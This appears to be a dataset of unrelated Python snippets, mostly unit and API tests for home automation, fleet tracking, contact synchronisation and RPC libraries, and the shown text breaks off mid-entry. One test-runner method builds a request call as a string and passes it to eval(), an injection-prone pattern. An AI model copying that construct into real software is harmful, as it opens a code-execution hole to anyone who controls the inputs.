self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_is_running(self, mock_call):\n\t\tmock_call.return_value = False \n\t\tdevice = Device(1, \"testDevice\", \"testDesc\", \"pump\", 1)\n\t\tdm = DeviceManager()\n\t\tresponse = dm.isRunning(device) \n\t\tself.assertEqual(response, False)", "def setUp(self):\n super(TestSyncServiceControl, self).setUp()\n self.api = ExternalApiClient()", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "async def test_get_fleet_locations(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/locations',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_service_refresh_devices_trigger_no_state_update(\n hass: HomeAssistant, aioclient_mock: AiohttpClientMocker\n) -> None:\n data = {\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n }\n }\n with patch.dict(DECONZ_WEB_REQUEST, data):\n config_entry = await setup_deconz_integration(hass, aioclient_mock)\n\n assert len(hass.states.async_all()) == 1\n\n captured_events = async_capture_events(hass, CONF_DECONZ_EVENT)\n\n aioclient_mock.clear_requests()\n\n data = {\n \"config\": {},\n \"groups\": {\n \"1\": {\n \"id\": \"Group 1 id\",\n \"name\": \"Group 1 name\",\n \"type\": \"LightGroup\",\n \"state\": {},\n \"action\": {},\n \"scenes\": [{\"id\": \"1\", \"name\": \"Scene 1\"}],\n \"lights\": [\"1\"],\n }\n },\n \"lights\": {\n \"1\": {\n \"name\": \"Light 1 name\",\n \"state\": {\"reachable\": True},\n \"type\": \"Light\",\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n \"sensors\": {\n \"1\": {\n \"name\": \"Switch 1\",\n \"type\": \"ZHASwitch\",\n \"state\": {\"buttonevent\": 1000},\n \"config\": {\"battery\": 100},\n \"uniqueid\": \"00:00:00:00:00:00:00:01-00\",\n }\n },\n }\n\n mock_deconz_request(aioclient_mock, config_entry.data, data)\n\n await hass.services.async_call(\n DECONZ_DOMAIN, SERVICE_DEVICE_REFRESH, service_data={CONF_BRIDGE_ID: BRIDGEID}\n )\n await hass.async_block_till_done()\n\n assert len(hass.states.async_all()) == 5\n assert len(captured_events) == 0", "def test_search_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"search master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search master instance from previous result\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n self.ins.runtime[\"route_instance_entry_list\"] = self.ins.get_route_instance_entry(mock_device_ins)\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n match_from_previous_response=True,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with brief and not interested counter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_BRIEF\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=1,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with detail\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_DETAIL\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=18,\n instance_rib_irib_holddown_count=0,\n )\n self.assertTrue(response)\n\n print(\"search instance info but entry don't have related parameter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=22,\n instance_rib_irib_holddown_count=0,\n )\n self.assertFalse(response)\n\n print(\"search instance info with extensive\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=0,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 16)", "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)", "async def test_get_dispatch_routes_by_vehicle_id(client):\n params = [('access_token', 'access_token_example'),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "async def test_rpc_ids(bus: lightbus.BusNode, dummy_api, mocker):\n\n async def co_call_rpc():\n await asyncio.sleep(0.1)\n return await bus.my.dummy.my_proc.call_async(field='foo')\n\n async def co_consume_rpcs():\n return await bus.bus_client.consume_rpcs(apis=[dummy_api])\n\n mocker.spy(bus.bus_client, 'send_result')\n\n (call_task, ), (consume_task, ) = await asyncio.wait([co_call_rpc(), co_consume_rpcs()], return_when=asyncio.FIRST_COMPLETED)\n _, kw = bus.bus_client.send_result.call_args\n rpc_message = kw['rpc_message']\n result_message = kw['result_message']\n consume_task.cancel()\n\n assert rpc_message.rpc_id\n assert result_message.rpc_id\n assert rpc_message.rpc_id == result_message.rpc_id", "async def test_rpc_ids(bus: lightbus.BusNode, dummy_api, mocker):\n\n async def co_call_rpc():\n asyncio.sleep(0.1)\n return await bus.my.dummy.my_proc.call_async(field='foo')\n\n async def co_consume_rpcs():\n return await bus.bus_client.consume_rpcs(apis=[dummy_api])\n\n mocker.spy(bus.bus_client, 'send_result')\n\n (call_task, ), (consume_task, ) = await asyncio.wait([co_call_rpc(), co_consume_rpcs()], return_when=asyncio.FIRST_COMPLETED)\n _, kw = bus.bus_client.send_result.call_args\n rpc_message = kw['rpc_message']\n result_message = kw['result_message']\n consume_task.cancel()\n\n assert rpc_message.rpc_id\n assert result_message.rpc_id\n assert rpc_message.rpc_id == result_message.rpc_id", "def test_get_query_with_api_key(self):\r\n users = UserFactory.create_batch(3)\r\n app = AppFactory.create(owner=users[0], info={'total': 150})\r\n task = TaskFactory.create(app=app, info={'url': 'my url'})\r\n taskrun = TaskRunFactory.create(task=task, user=users[0],\r\n info={'answer': 'annakarenina'})\r\n for endpoint in self.endpoints:\r\n url = '/api/' + endpoint + '?api_key=' + users[1].api_key\r\n res = self.app.get(url)\r\n data = json.loads(res.data)\r\n\r\n if endpoint == 'app':\r\n assert len(data) == 1, data\r\n app = data[0]\r\n assert app['info']['total'] == 150, data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'task':\r\n assert len(data) == 1, data\r\n task = data[0]\r\n assert task['info']['url'] == 'my url', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'taskrun':\r\n assert len(data) == 1, data\r\n taskrun = data[0]\r\n assert taskrun['info']['answer'] == 'annakarenina', data\r\n assert res.mimetype == 'application/json', res\r\n\r\n if endpoint == 'user':\r\n assert len(data) == 3, data\r\n user = data[0]\r\n assert user['name'] == 'user1', data\r\n assert res.mimetype == 'application/json', res", "async def api(call):\n _LOGGER.debug(\"call %s\", call)\n service_data = call.data\n email = service_data.get(CONF_EMAIL, \"\")\n\n if len(hass.config_entries.async_entries(DOMAIN)) > 1 and not email:\n raise ValueError(\"Email address missing\")\n controller: Controller = None\n for entry in hass.config_entries.async_entries(DOMAIN):\n if (\n len(hass.config_entries.async_entries(DOMAIN)) > 1\n and entry.title != email\n ):\n continue\n controller = hass.data[DOMAIN].get(entry.entry_id)[\"coordinator\"].controller\n if controller is None:\n raise ValueError(f\"No Tesla controllers found for email {email}\")\n command = call.data.get(ATTR_COMMAND)\n parameters: dict = call.data.get(ATTR_PARAMETERS, {})\n _LOGGER.debug(\n \"Service api called with email: %s command: %s parameters: %s\",\n email,\n command,\n parameters,\n )\n path_vars = parameters.pop(ATTR_PATH_VARS)\n return await controller.api(name=command, path_vars=path_vars, **parameters)", "def test_1_variantcall(install_test_files, data_dir):\n with make_workdir() as workdir:\n cl = [\"bcbio_nextgen.py\",\n get_post_process_yaml(data_dir, workdir),\n os.path.join(data_dir, os.pardir, \"100326_FC6107FAAXX\"),\n os.path.join(data_dir, \"run_info-variantcall.yaml\")]\n subprocess.check_call(cl)", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_request(comms):\n kernel_comm, frontend_comm = comms\n\n def handler(a, b):\n return a + b\n\n kernel_comm.register_call_handler('test_request', handler)\n\n res = frontend_comm.remote_call(blocking=True).test_request('a', b='b')\n\n assert res == 'ab'", "def invoke():\n # CONFIG: Read configuration information\n config = conf.get_yaml_field(gl.configFile)\n dd_enable = config['ENABLE_DDING']\n dd_token = config['DD_TOKEN']\n dd_url = config['DING_URL']\n email_enable = config['EMAIL_ENABLE']\n # END CONFIG.\n\n # Test report file name.\n time_str = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n path = RunTestCase.create_report_file()\n\n # Start test the send pin message.\n if dd_enable:\n scripts.send_msg_dding(\n '{}:★开始API接口自动化测试★'.format(time_str),\n dd_token,\n dd_url\n )\n\n # Execute the test and send the test report.\n RunTestCase.run(path)\n if dd_enable:\n # Template message.\n dir_list = path.split('\\\\')\n low_path = dir_list[len(dir_list) - 2]\n msg = RunTestCase.tmpl_msg(low_path)\n print(msg)\n scripts.send_msg_dding(msg, dd_token, dd_url)\n\n if email_enable:\n # Send test report to EMAIL.\n email = EmailClass()\n email.send(path)", "def test_run():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2, 4, 5, 6, 7])\n data = [create_everbridge_contacts([1, 2, 3, 5, 8], True)]\n delete_ids = [3, 8]\n update_ids = [1, 2]\n insert_ids = [4, 6, 7]\n modify_everbridge_data(data[0], update_ids, 'phone', '8087779999')\n modify_everbridge_data(data[0], delete_ids, 'groups', [gid])\n update_data = create_everbridge_contacts(update_ids, True)\n insert_data = create_everbridge_contacts(insert_ids, False)\n upsert_data = update_data + insert_data\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = (\n '&[email protected]' +\n '&[email protected]' +\n '&[email protected]')\n ever = create_everbridge_mock(data)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(123)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_not_called()\n ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_called_with(gid, delete_ids)\n ever.delete_contacts.assert_called_with(delete_ids)\n ever.upsert_contacts.assert_called_with(upsert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 6, 'everbridge_count': 5, 'error_contacts': 0,\n 'inserted_contacts': 3, 'updated_contacts': 2, 'removed_members': 2,\n 'deleted_contacts': 2, 'added_members': 3}\n }", "async def test_get_vehicles_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/locations',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_vehicle_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/{vehicle_id}/locations'.format(vehicle_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_api_predictor_events_get(self):\n pass", "async def test_get_dvirs(client):\n params = [('access_token', 'access_token_example'),\n ('end_ms', 56),\n ('duration_ms', 56),\n ('group_id', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/maintenance/dvirs',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_automation_trace(hass, hass_ws_client):\n id = 1\n\n def next_id():\n nonlocal id\n id += 1\n return id\n\n sun_config = {\n \"id\": \"sun\",\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event\"},\n \"action\": {\"service\": \"test.automation\"},\n }\n moon_config = {\n \"id\": \"moon\",\n \"trigger\": [\n {\"platform\": \"event\", \"event_type\": \"test_event2\"},\n {\"platform\": \"event\", \"event_type\": \"test_event3\"},\n ],\n \"condition\": {\n \"condition\": \"template\",\n \"value_template\": \"{{ trigger.event.event_type=='test_event2' }}\",\n },\n \"action\": {\"event\": \"another_event\"},\n }\n\n assert await async_setup_component(\n hass,\n \"automation\",\n {\n \"automation\": [\n sun_config,\n moon_config,\n ]\n },\n )\n\n with patch.object(config, \"SECTIONS\", [\"automation\"]):\n await async_setup_component(hass, \"config\", {})\n\n client = await hass_ws_client()\n\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {}\n\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"sun\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {\"sun\": []}\n\n # Trigger \"sun\" automation\n hass.bus.async_fire(\"test_event\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"moon\" not in response[\"result\"]\n assert len(response[\"result\"][\"sun\"]) == 1\n trace = response[\"result\"][\"sun\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert trace[\"action_trace\"][\"action/0\"][0][\"error\"]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert trace[\"condition_trace\"] == {}\n assert trace[\"config\"] == sun_config\n assert trace[\"context\"]\n assert trace[\"error\"] == \"Unable to find service test.automation\"\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event'\"\n assert trace[\"unique_id\"] == \"sun\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 1\n trace = response[\"result\"][\"moon\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with failing condition\n hass.bus.async_fire(\"test_event3\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 2\n trace = response[\"result\"][\"moon\"][1]\n assert len(trace[\"action_trace\"]) == 0\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": False}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event3'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 3\n trace = response[\"result\"][\"moon\"][2]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]", "def test_called(self, mock_bootstrap, mock_api, mock_match):\n # host/port details returned by bootstrap\n mock_bootstrap.side_effect = [('host', 1234)]\n # short-circuit version checking\n mock_match.side_effect = [True] * 2\n mock_api.version().side_effect = ['1.0.0']\n\n # Check that all four api's created are passed the network details\n with patch('fetchai.ledger.api.TokenApi') as tapi, \\\n patch('fetchai.ledger.api.ContractsApi') as capi, \\\n patch('fetchai.ledger.api.TransactionApi') as txapi, \\\n patch('fetchai.ledger.api.ServerApi') as sapi:\n _ = LedgerApi(network='alpha')\n\n tapi.assert_called_once_with('host', 1234)\n capi.assert_called_once_with('host', 1234)\n txapi.assert_called_once_with('host', 1234)\n sapi.assert_called_once_with('host', 1234)\n\n # Check that bootstrap is queried\n mock_bootstrap.assert_called_once_with('alpha')", "def trigger_service(call):\n event = call.data.get(ATTR_EVENT)\n value1 = call.data.get(ATTR_VALUE1)\n value2 = call.data.get(ATTR_VALUE2)\n value3 = call.data.get(ATTR_VALUE3)\n if event is None:\n return\n\n try:\n import pyfttt as pyfttt\n pyfttt.send_event(key, event, value1, value2, value3)\n except requests.exceptions.RequestException:\n _LOGGER.exception(\"Error communicating with IFTTT\")", "async def test_services(hass, coap_wrapper):\n assert coap_wrapper\n\n hass.async_create_task(\n hass.config_entries.async_forward_entry_setup(coap_wrapper.entry, SWITCH_DOMAIN)\n )\n await hass.async_block_till_done()\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_ON,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_ON\n\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_OFF,\n {ATTR_ENTITY_ID: \"switch.test_name_channel_1\"},\n blocking=True,\n )\n assert hass.states.get(\"switch.test_name_channel_1\").state == STATE_OFF", "def test_run_add_group():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2])\n data = [create_everbridge_contacts([], True)]\n insert_ids = [1, 2]\n insert_data = create_everbridge_contacts(insert_ids, False)\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = ('&[email protected]&[email protected]')\n ever = create_everbridge_mock(data)\n ever.add_group = MagicMock(return_value={'id': 123})\n ever.get_group_id_by_name = MagicMock(return_value=None)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(gid)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_called_with('GROUP1', None)\n ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_not_called()\n ever.delete_contacts.assert_not_called()\n ever.upsert_contacts.assert_called_with(insert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 2, 'everbridge_count': 0, 'error_contacts': 0,\n 'inserted_contacts': 2, 'updated_contacts': 0, 'removed_members': 0,\n 'deleted_contacts': 0, 'added_members': 2}\n }", "def run(self):\r\n logging.info(\"Now excecuting test step {}\".format(self.stepname))\r\n try:\r\n response = eval(\"requests.{}('{}',params={})\".format(self.verb, self.url, self.payload))\r\n return response, True\r\n\r\n except requests.exceptions.RequestException as e:\r\n logging.warn(\"test {} failed\".format(self.stepname))\r\n \r\n return None, False", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def run(self,base_url):\n\n url = base_url + self.endpoint\n\n if self.method.upper() == \"GET\":\n r = requests.get(url)\n\n elif self.method.upper() == \"POST\":\n\n if self.payload is not None:\n r = requests.post(url, json=self.payload)\n else:\n r = requests.post(url)\n\n else:\n msg = \"Malformed test. Allowed methods are GET and POST\"\n return get_failure_object(msg)\n\n try:\n\n resp = r.json()\n\n except ValueError as e:\n\n msg = \"Could not decode JSON from response.\"\n return get_failure_object(msg)\n\n try:\n\n # Run all checks for expected exact JSON response values\n for check_key in self.expected_values:\n\n exp_val = self.expected_values[check_key]\n\n if exp_val != resp[check_key]:\n\n msg = \"Expected value '%s' at key '%s' but got '%s'.\" \\\n % (str(exp_val), str(check_key), str(resp[check_key]))\n\n return get_failure_object(msg)\n\n # Run all checks for expected types in JSON response\n for check_key in self.expected_types:\n\n exp_type = self.expected_types[check_key]\n val = resp[check_key]\n\n if exp_type == \"string\":\n type_res = test_expected_type(val, str)\n\n elif exp_type == \"int\":\n type_res = test_expected_type(val, int)\n\n elif exp_type == \"float\":\n type_res = test_expected_type(val, float)\n\n else:\n msg = \"Malformed test. Expected types allowed: 'str',\\\n 'int', 'float'\"\n return {\"status\": \"FAILED\", \"error_msg\": msg}\n\n if type_res == False:\n msg = get_expected_type_error_message(check_key, val, exp_type)\n return get_failure_object(msg)\n\n return {\"status\":\"PASSED\"}\n\n except KeyError as e:\n msg = \"Expected key '%s' not found.\" % str(e.args[0])\n return get_failure_object(msg)", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "def test_fax_inbound_automation_post(self):\n pass", "def test_call_log(self):\n\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.INCOMMING_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time() * 1000))\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.INCOMMING_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - 4 * CALL_LOG_TIME_OFFSET_IN_MSEC)\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.OUTGOING_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - CALL_LOG_TIME_OFFSET_IN_MSEC)\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.MISSED_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - 2 * CALL_LOG_TIME_OFFSET_IN_MSEC)\n bt_contacts_utils.add_call_log(\n self.pse, bt_contacts_utils.MISSED_CALL_TYPE,\n bt_contacts_utils.generate_random_phone_number().phone_number,\n int(time.time()) * 1000 - 2 * CALL_LOG_TIME_OFFSET_IN_MSEC)\n\n self.pce.droid.bluetoothPbapClientDisconnect(\n self.pse.droid.bluetoothGetLocalAddress())\n self.pce.droid.bluetoothPbapClientDisconnect(\n self.pse2.droid.bluetoothGetLocalAddress())\n\n bt_test_utils.connect_pri_to_sec(\n self.pce, self.pse,\n set([BtEnum.BluetoothProfile.PBAP_CLIENT.value]))\n pse_call_log_count = self.pse.droid.callLogGetCount()\n self.log.info(\"Waiting for {} call logs to be transfered\".format(\n pse_call_log_count))\n bt_contacts_utils.wait_for_call_log_update_complete(self.pce,\n pse_call_log_count)\n\n if not bt_contacts_utils.get_and_compare_call_logs(\n self.pse, self.pce, bt_contacts_utils.INCOMMING_CALL_TYPE):\n return False\n if not bt_contacts_utils.get_and_compare_call_logs(\n self.pse, self.pce, bt_contacts_utils.OUTGOING_CALL_TYPE):\n return False\n if not bt_contacts_utils.get_and_compare_call_logs(\n self.pse, self.pce, bt_contacts_utils.MISSED_CALL_TYPE):\n return False\n\n return True", "def setUp(self):\n self.hass = get_test_home_assistant()\n mock_component(self.hass, 'group')\n assert setup_component(self.hass, zone.DOMAIN, {\n 'zone': {\n 'name': 'test',\n 'latitude': 32.880837,\n 'longitude': -117.237561,\n 'radius': 250,\n }\n })\n\n self.calls = []\n\n @callback\n def record_call(service):\n \"\"\"Record calls.\"\"\"\n self.calls.append(service)\n\n self.hass.services.register('test', 'automation', record_call)", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": 